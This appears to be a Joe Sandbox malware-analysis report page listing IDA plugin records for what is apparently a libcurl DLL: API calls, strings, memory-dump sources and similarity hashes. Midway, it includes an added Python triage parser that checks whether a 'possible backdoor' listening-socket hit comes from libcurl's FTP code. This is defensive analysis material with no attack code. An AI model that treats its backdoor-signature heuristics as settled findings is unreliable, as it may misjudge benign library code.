• API ID: curl_strnequal
• String ID: NTLM$NTLM auth restarted$NTLM handshake failure (internal error)$NTLM handshake rejected
• API String ID: 482932555-2258391893
• Opcode ID: 07539ba38f4b514307c445e9e9dcb94fbc29e759067e62cf3087dd2135495ad6
• Instruction ID: d297fe22e99a46d020775a83e262795ef45ceac217235a4974b233311bf38f48
• Opcode Fuzzy Hash: 07539ba38f4b514307c445e9e9dcb94fbc29e759067e62cf3087dd2135495ad6
• Instruction Fuzzy Hash: F321E4F6A102056BEB105E74FC41B9ABBA9DF41268F144872FC48C7102E73AE665CAA0
APIs
• curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lnk), ref: 6B6F06EF
• curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B6F072F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: curl_msnprintfcurl_mvsnprintf
• String ID: $lnk$...$...
• API String ID: 4251218765-1176918924
• Opcode ID: 8729573473bd4b6e7aa82df4a3a41634091421992d4ebf2fe0c30f7c340f632d
• Instruction ID: 2a40773e4294824afb7e6e29f4e54f704e198f08044bcad58845c92fe6d444fa
• Opcode Fuzzy Hash: 8729573473bd4b6e7aa82df4a3a41634091421992d4ebf2fe0c30f7c340f632d
• Instruction Fuzzy Hash: 1A11E4B9904208AADF10CE28DC41BFD77AAEB01308F0441D9E89467141DB79A74BCBD0
APIs
• curl_getenv.LIBCURL(CURL_SSL_BACKEND,?,?,?,6B70CB27,00000000,6B6D692E), ref: 6B70DA73
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: curl_getenv
• String ID: CURL_SSL_BACKEND$PfskPfsk
• API String ID: 2452071183-279058013
• Opcode ID: f9ce98a363ce68133fb2a38b3ae2f06576665933ad818902badb5edf2ac06ef1
• Instruction ID: d6abead700d100f8d0f0ecb1a5c554a8fcd9190e927c1330d72a5ff6bfc7c8a0
• Opcode Fuzzy Hash: f9ce98a363ce68133fb2a38b3ae2f06576665933ad818902badb5edf2ac06ef1
• Instruction Fuzzy Hash: F7010CF36682014BDB049AA0B900B1B37E8EB8135AF05007BF829C3214EB39D651D755
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6B71C475,?,?,6B71C43D,?,00000000,?), ref: 6B71C4D8
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6B71C4EB
• FreeLibrary.KERNEL32(00000000,?,?,6B71C475,?,?,6B71C43D,?,00000000,?), ref: 6B71C50E
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: fd514d9c233de41f0ad442f82b1d50f36bef37a2764034177f1dad18ee58fc43
• Instruction ID: c0c5a2e2f0e8c37def13508468120f28c15a222ddf030fb2bdbb48d959e838f4
• Opcode Fuzzy Hash: fd514d9c233de41f0ad442f82b1d50f36bef37a2764034177f1dad18ee58fc43
• Instruction Fuzzy Hash: D2F01231504118FBDF019BA1C909B9E7F64EB0575AF200075B811A5151DB35EF01DAA0
APIs
• _free.LIBCMT ref: 6B725E65
  • Part of subcall function 6B71F7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B725EE0,6B7438A0,00000000,6B7438A0,00000000,?,6B725F07,6B7438A0,00000007,6B7438A0,?,6B72532A,6B7438A0), ref: 6B71F800
  • Part of subcall function 6B71F7EA: GetLastError.KERNEL32(6B7438A0,?,6B725EE0,6B7438A0,00000000,6B7438A0,00000000,?,6B725F07,6B7438A0,00000007,6B7438A0,?,6B72532A,6B7438A0,6B7438A0), ref: 6B71F812
• _free.LIBCMT ref: 6B725E77
• _free.LIBCMT ref: 6B725E89
• _free.LIBCMT ref: 6B725E9B
• _free.LIBCMT ref: 6B725EAD
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 1ea4897fc4f80f714bb10ef4181ae0f2cfffe0459d1faac63faac4481c569560
• Instruction ID: ea0c1e86433772410c5e793d649ef244ac668b12abb59761bea8836ce381bda0
• Opcode Fuzzy Hash: 1ea4897fc4f80f714bb10ef4181ae0f2cfffe0459d1faac63faac4481c569560
• Instruction Fuzzy Hash: 60F04F719186049F8B14EA74E3D6D1F33E9BA002157940C6AF128EF508D778F8808AB4
APIs
  • Part of subcall function 6B6C6970: inet_pton.WS2_32(00000002,?,?), ref: 6B6C699A
  • Part of subcall function 6B6C6970: inet_pton.WS2_32(00000017,?,?), ref: 6B6C69AB
• inet_pton.WS2_32(00000002,?,?), ref: 6B6C5CC3
• inet_pton.WS2_32(00000017,?,?), ref: 6B6C5CD2
• ___from_strstr_to_strchr.LIBCMT ref: 6B6C5D8E
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: inet_pton$___from_strstr_to_strchr
• String ID: /
• API String ID: 1475684856-2043925204
• Opcode ID: eee6e752fd65d7145f0f56a5990a1a1d190b4d472656cf0a15dc017745d1ea8f
• Instruction ID: e7f19a264151a2e16f5a9ae67d094739493c184d1246e6eada169ab2cfe1eb08
• Opcode Fuzzy Hash: eee6e752fd65d7145f0f56a5990a1a1d190b4d472656cf0a15dc017745d1ea8f
• Instruction Fuzzy Hash: 62C1A2F1A007469BDB11DF78CD466ABBBF4EF09200F0401A9ED69D7641EB39E514CBA2
APIs
• WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,6B6CD060,?,?,6B6CBEF5), ref: 6B6CCE4D
Strings
• We got a 421 - timeout!, xrefs: 6B6CCE70
• FTP response timeout, xrefs: 6B6CCE98
• FTP response aborted due to select/poll error: %d, xrefs: 6B6CCE54
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: ErrorLast
• String ID: FTP response aborted due to select/poll error: %d$FTP response timeout$We got a 421 - timeout!
• API String ID: 1452528299-2064316097
• Opcode ID: 0bb0ecf8a2f90b5623ebcc2ef355cd76d95ea3456760cfb272d21bd77b8442f2
• Instruction ID: 5a71750539b3b68a226b8c8953bc958952d27f2ebd5cc9cfba46b27011950fe4
• Opcode Fuzzy Hash: 0bb0ecf8a2f90b5623ebcc2ef355cd76d95ea3456760cfb272d21bd77b8442f2
• Instruction Fuzzy Hash: 1251B4B6E012099FDB108F68DC40BAFBBB5FF49315F1001B6E81997250E7399A51CBE2
APIs
• getsockname.WS2_32(BB830100,?,?), ref: 6B6CCB43
• accept.WS2_32(?,?,00000080), ref: 6B6CCB6B
  • Part of subcall function 6B6F06B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lnk), ref: 6B6F06EF
  • Part of subcall function 6B6F06B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B6F072F
  • Part of subcall function 6B6EA660: ioctlsocket.WS2_32(00000000,8004667E,TElk), ref: 6B6EA67A
Strings
• Connection accepted from server, xrefs: 6B6CCBAB
• Error accept()ing server connect, xrefs: 6B6CCB87
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: acceptcurl_msnprintfcurl_mvsnprintfgetsocknameioctlsocket
• String ID: Connection accepted from server$Error accept()ing server connect
• API String ID: 1634289926-2331703088
• Opcode ID: 60b7e900826d5f6cc0cb1874e2900e16fa54baad64253a9e968bd4b17a532e8a
• Instruction ID: ada5297b166b2fa2c4d7e13e662700ac1c9cfcb76f404c4c0407657e0163353c
• Opcode Fuzzy Hash: 60b7e900826d5f6cc0cb1874e2900e16fa54baad64253a9e968bd4b17a532e8a
• Instruction Fuzzy Hash: 0031CAB1A00214ABDB10DF78DC81BEEB7B8EF45315F0042A6FC5DA7181DF355A548BA5
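The getsockname()/accept() record above is the kind of hit behind the report's "open a port and listen for incoming connection (possibly a backdoor)" signature, but the same function reaches curl_msnprintf/curl_mvsnprintf in LIBCURL and carries the strings "Connection accepted from server" and "Error accept()ing server connect", which places it in libcurl's FTP active-mode data-connection handling rather than in code specific to this sample. The Python below is an added triage helper written for this page; it is not part of the Joe Sandbox report or its IDA plugin. It parses the plugin's per-function records (APIs, Strings, Memory Dump Source, Similarity) into structured objects and flags records that call listening-socket Winsock APIs, attributing a hit to libcurl when the same function (including its listed subcalls) references LIBCURL exports. The record format is assumed from what this page shows; the embedded SAMPLE is abridged from two records above; the LISTEN_APIS set and the LIBCURL attribution rule are this example's own heuristics.

```python
"""Parse Joe Sandbox 'IDA Plugin' function records and triage listening-socket hits.

Added example for this page; the record layout is assumed from the report text shown here.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR", optionally prefixed by
# "Part of subcall function ADDR: " (the plugin's way of listing callees' API use).
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<subaddr>[0-9A-Fa-f]+): )?"
    r"(?P<name>[\w@?$]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<ref>[0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^(?P<key>[A-Za-z ]+?): (?P<val>.*)$")
SECTIONS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Heuristic (this example's own): Winsock calls that indicate a socket set up to be
# connected *to*, as opposed to plain outbound client traffic.
LISTEN_APIS = {"bind", "listen", "accept", "WSAAccept", "getsockname"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: str
    via_subcall: Optional[str]  # address of the subcall that made it, if any


@dataclass
class Record:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)      # (text, xref address)
    associated: list = field(default_factory=list)   # Associated memory dumps
    fields: dict = field(default_factory=dict)       # Source File, API ID, hashes, ...


def parse_records(text: str) -> list[Record]:
    """Split plugin output into one Record per function (each starts at an 'APIs' line)."""
    records: list[Record] = []
    cur: Optional[Record] = None
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            cur = Record()
            records.append(cur)
            section = "APIs"
            continue
        if cur is None:
            continue
        if line in SECTIONS:
            section = line
            continue
        if line.startswith("•"):
            line = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                cur.apis.append(ApiCall(m["name"], m["module"], m["args"] or "", m["ref"], m["subaddr"]))
        elif section == "Strings":
            m = STRING_RE.match(line)
            if m:
                cur.strings.append((m["text"], m["ref"]))
        else:
            m = FIELD_RE.match(line)
            if m and m["key"] == "Associated":
                cur.associated.append(m["val"])
            elif m:
                cur.fields[m["key"]] = m["val"]
    return records


def triage_listeners(records: list[Record]) -> list[dict]:
    """Return one dict per record that touches a listening-socket API, with a verdict.

    'libcurl' means the same function also references LIBCURL exports (e.g. the
    accept() record on this page, which sits in libcurl's FTP data-connection code);
    'review' means no such attribution was possible and an analyst should look.
    """
    hits = []
    for r in records:
        ws = [a.name for a in r.apis if a.module.upper() == "WS2_32" and a.name in LISTEN_APIS]
        if not ws:
            continue
        in_curl = any(a.module.upper() == "LIBCURL" or a.name.startswith("curl_") for a in r.apis)
        hits.append({"api_id": r.fields.get("API ID", ""), "listen_apis": ws,
                     "strings": [s for s, _ in r.strings],
                     "verdict": "libcurl" if in_curl else "review"})
    return hits


# Constructed sample input: two records abridged from this report page.
SAMPLE = """\
APIs
• getsockname.WS2_32(BB830100,?,?), ref: 6B6CCB43
• accept.WS2_32(?,?,00000080), ref: 6B6CCB6B
  • Part of subcall function 6B6F06B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lnk), ref: 6B6F06EF
  • Part of subcall function 6B6EA660: ioctlsocket.WS2_32(00000000,8004667E,TElk), ref: 6B6EA67A
Strings
• Connection accepted from server, xrefs: 6B6CCBAB
• Error accept()ing server connect, xrefs: 6B6CCB87
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
Similarity
• API ID: acceptcurl_msnprintfcurl_mvsnprintfgetsocknameioctlsocket
• String ID: Connection accepted from server$Error accept()ing server connect
• API String ID: 1634289926-2331703088
• Instruction Fuzzy Hash: 0031CAB1A00214ABDB10DF78DC81BEEB7B8EF45315F0042A6FC5DA7181DF355A548BA5
APIs
• CloseHandle.KERNEL32(00000000,00000000,8hlk,?,6B71CF35,8hlk,6B73E6B8,0000000C,6B71CFE7,6B73E430), ref: 6B71D05D
• GetLastError.KERNEL32(?,6B71CF35,8hlk,6B73E6B8,0000000C,6B71CFE7,6B73E430), ref: 6B71D067
• __dosmaperr.LIBCMT ref: 6B71D092
Strings
Similarity
• API ID: CloseErrorHandleLast__dosmaperr
• String ID: 8hlk
"""

if __name__ == "__main__":
    for hit in triage_listeners(parse_records(SAMPLE)):
        print(hit)
```

Run it on a full report dump (copy the IDA plugin section to a file and pass its contents to parse_records) and only the records whose verdict is "review" need a human look; the libcurl-attributed ones explain the "listen for incoming connection" signature without pointing at sample-specific backdoor code. The "API String ID" and fuzzy-hash fields survive in Record.fields, so the same parse can feed similarity pivots across reports.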
                                                                                                                            APIs
                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,8hlk,?,6B71CF35,8hlk,6B73E6B8,0000000C,6B71CFE7,6B73E430), ref: 6B71D05D
                                                                                                                            • GetLastError.KERNEL32(?,6B71CF35,8hlk,6B73E6B8,0000000C,6B71CFE7,6B73E430), ref: 6B71D067
                                                                                                                            • __dosmaperr.LIBCMT ref: 6B71D092
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: CloseErrorHandleLast__dosmaperr
• String ID: 8hlk
APIs
  • Part of subcall function 6B6FACC0: GetModuleHandleA.KERNEL32(kernel32,?,00000002,6B6FAEAE), ref: 6B6FACCE
• GetProcAddress.KERNEL32(00000000,InitSecurityInterfaceA), ref: 6B6C90FD
Similarity
• API ID: AddressHandleModuleProc
• String ID: InitSecurityInterfaceA$secur32.dll$security.dll
APIs
• _free.LIBCMT ref: 6B724E87
• _free.LIBCMT ref: 6B724EB0
• SetEndOfFile.KERNEL32(00000000,6B71D700,00000000,?,?,?,?,?,?,?,?,6B71D700,?,00000000), ref: 6B724EE2
• GetLastError.KERNEL32(?,?,?,?,?,?,?,6B71D700,?,00000000,?,?,?,?,00000000,?), ref: 6B724EFE
Similarity
• API ID: _free$ErrorFileLast
APIs
• GetLastError.KERNEL32(?,?,?,6B7137F2,?,00000000,00000000,?,6B7184AA,6B718987,00000000,?,00000000), ref: 6B71F540
• _free.LIBCMT ref: 6B71F59D
• _free.LIBCMT ref: 6B71F5D3
• SetLastError.KERNEL32(00000000,00000015,000000FF,?,6B7184AA,6B718987,00000000,?,00000000), ref: 6B71F5DE
Similarity
• API ID: ErrorLast_free
APIs
• GetLastError.KERNEL32(00000000,?,00000000,6B711F4E,6B718951,6B718465,?,00000000,?,?,?,?,?,?,?,CMnk), ref: 6B71F697
• _free.LIBCMT ref: 6B71F6F4
• _free.LIBCMT ref: 6B71F72A
• SetLastError.KERNEL32(00000000,00000015,000000FF,?,?,?,?,?,?,?,CMnk,6B718987,00000000,?,?,0000000A), ref: 6B71F735
Similarity
• API ID: ErrorLast_free
APIs
• QueryPerformanceCounter.KERNEL32(6B6EF03B,?,6B6C669E,6B6EF03B,?,?,?,?), ref: 6B6FE5E5
• __alldvrm.LIBCMT ref: 6B6FE5FE
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6FE627
• GetTickCount.KERNEL32 ref: 6B6FE642
Similarity
• API ID: CountCounterPerformanceQueryTickUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
APIs
• WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,6B725102,00000000,00000001,00000000,00000000,?,6B71E891,?,6B7192EA,00000000), ref: 6B728616
• GetLastError.KERNEL32(?,6B725102,00000000,00000001,00000000,00000000,?,6B71E891,?,6B7192EA,00000000,?,00000000,?,6B71EDE5,?), ref: 6B728622
  • Part of subcall function 6B7285E8: CloseHandle.KERNEL32(FFFFFFFE,6B728632,?,6B725102,00000000,00000001,00000000,00000000,?,6B71E891,?,6B7192EA,00000000,?,00000000), ref: 6B7285F8
• ___initconout.LIBCMT ref: 6B728632
  • Part of subcall function 6B7285AA: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6B7285D9,6B7250EF,00000000,?,6B71E891,?,6B7192EA,00000000,?), ref: 6B7285BD
• WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,6B725102,00000000,00000001,00000000,00000000,?,6B71E891,?,6B7192EA,00000000,?), ref: 6B728647
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
APIs
  • Part of subcall function 6B6C14E0: EnterCriticalSection.KERNEL32(?,?,00000000,?,?,?,6B6D1C62,?,00000000), ref: 6B6C15E0
  • Part of subcall function 6B6C14E0: LeaveCriticalSection.KERNEL32(?,?,?,6B6D1C62,?,00000000), ref: 6B6C15F3
  • Part of subcall function 6B6C14E0: closesocket.WS2_32(000006FC), ref: 6B6C1642
• curl_msnprintf.LIBCURL(?,00000100,Connection #%ld to host %s left intact,?,?), ref: 6B6E8690
Similarity
• API ID: CriticalSection$EnterLeaveclosesocketcurl_msnprintf
• String ID: %s$Connection #%ld to host %s left intact
                                                                                                                            • API String ID: 283241466-118628944
                                                                                                                            • Opcode ID: 78a19c4e8a4486e3ed6caf266d4d4b124ae1438ff579d9f307f3038f5c2f40a2
                                                                                                                            • Instruction ID: 6c4145733356e1eb89cd6ccec62f6ac6893e58a81052919a19c7f6e40e30ac69
                                                                                                                            • Opcode Fuzzy Hash: 78a19c4e8a4486e3ed6caf266d4d4b124ae1438ff579d9f307f3038f5c2f40a2
                                                                                                                            • Instruction Fuzzy Hash: 22A116F0605B01AFD721CF34CC45BDAB7A4BF05309F0001A9E869562A1DB79A656CFB5
APIs
• ___from_strstr_to_strchr.LIBCMT ref: 6B6CAE35
Strings
• Can't get the size of %s, xrefs: 6B6CAF14
• Can't open %s for writing, xrefs: 6B6CAE9E
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: ___from_strstr_to_strchr
• String ID: Can't get the size of %s$Can't open %s for writing
• API String ID: 601868998-3544860555
• Opcode ID: f87bde237729b2706f5c81bd76d1b0069a49f0c9fff56d744e090df69f421e58
• Instruction ID: 69b91b9017d03bc078022b9f65c384101cd8179e874167f93ec4a21b0b4461a2
• Opcode Fuzzy Hash: f87bde237729b2706f5c81bd76d1b0069a49f0c9fff56d744e090df69f421e58
• Instruction Fuzzy Hash: 5B81B2F1F002089BDB14DFB8DD81AEEB7F5EF88304F14417AE91A97200EB7969558B52
APIs
• curl_strnequal.LIBCURL(Set-Cookie:,00000000,0000000B,?,?,?,00000000), ref: 6B6C615B
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: curl_strnequal
• String ID: Set-Cookie:$none
• API String ID: 482932555-3629594122
• Opcode ID: 97126a36848ffee822a02ccd78b004c995358694d279cc1838a2ff60cd337b75
• Instruction ID: 7815894970f8d6a45d1b01348f483cc506bdb2f79d794b3bfcc1c3f09c56cc7b
• Opcode Fuzzy Hash: 97126a36848ffee822a02ccd78b004c995358694d279cc1838a2ff60cd337b75
• Instruction Fuzzy Hash: 785108F1A083856AEB014A385D467BB3FA5DF12249F0800F5ED55AB243EB6AC545C2AB
APIs
  • Part of subcall function 6B6D87E0: curl_msnprintf.LIBCURL(?,00000007,:%u,?,00000000,?,?,?,6B6D7CB2,?,?,?,00000106,?,00000000), ref: 6B6D8830
• curl_msnprintf.LIBCURL(?,00000007,:%u,?,0000002A,?,?,?,?,?,00000000,00000000), ref: 6B6D88CF
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: curl_msnprintf
• String ID: :%u$Hostname in DNS cache was stale, zapped
• API String ID: 1809024409-2924501231
• Opcode ID: 9cc23f4a3e3c2cdc0b4d8feefad321df504e43a13763ffa8555770b8a485b1bf
• Instruction ID: 554eaca144e87772c956d541756a4b81f7e53b661c20c88d9321454ad56736ee
• Opcode Fuzzy Hash: 9cc23f4a3e3c2cdc0b4d8feefad321df504e43a13763ffa8555770b8a485b1bf
• Instruction Fuzzy Hash: FD4147B1A00209AFCF15DF38CC45BEAB778EF05304F0052E9E99957211DB39AA55CFA1
APIs
  • Part of subcall function 6B6FE5D0: QueryPerformanceCounter.KERNEL32(6B6EF03B,?,6B6C669E,6B6EF03B,?,?,?,?), ref: 6B6FE5E5
  • Part of subcall function 6B6FE5D0: __alldvrm.LIBCMT ref: 6B6FE5FE
  • Part of subcall function 6B6FE5D0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6FE627
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6D40E3
Strings
• Too old connection (%ld seconds), disconnect it, xrefs: 6B6D40FF
• Connection %ld seems to be dead!, xrefs: 6B6D415B
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$CounterPerformanceQuery__alldvrm
• String ID: Connection %ld seems to be dead!$Too old connection (%ld seconds), disconnect it
• API String ID: 3283211967-2324667105
• Opcode ID: fd2258ae2f43356b9b79d8b6490606914269165f374383a617943b4f14b536b4
• Instruction ID: 4cd36ed210fb7a371aa42bfc87081d96b8acae18c1790b393b70dd354bfbf160
• Opcode Fuzzy Hash: fd2258ae2f43356b9b79d8b6490606914269165f374383a617943b4f14b536b4
• Instruction Fuzzy Hash: 943139B1E04205ABE7105F388C43BF6B769EB55328F5002A4F82C672C2E7B969A583D5
APIs
• curl_slist_append.LIBCURL(00000000,Content-Type: application/dns-message,0000013C,00000000,00000440,?,00000000,00000000,?,6B6D8617,00000000,00000000,?,00000000), ref: 6B6EDB87
• curl_slist_free_all.LIBCURL(?,?,?,?,?,?,?,?,?,?), ref: 6B6EDC0D
Strings
• Content-Type: application/dns-message, xrefs: 6B6EDB74
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
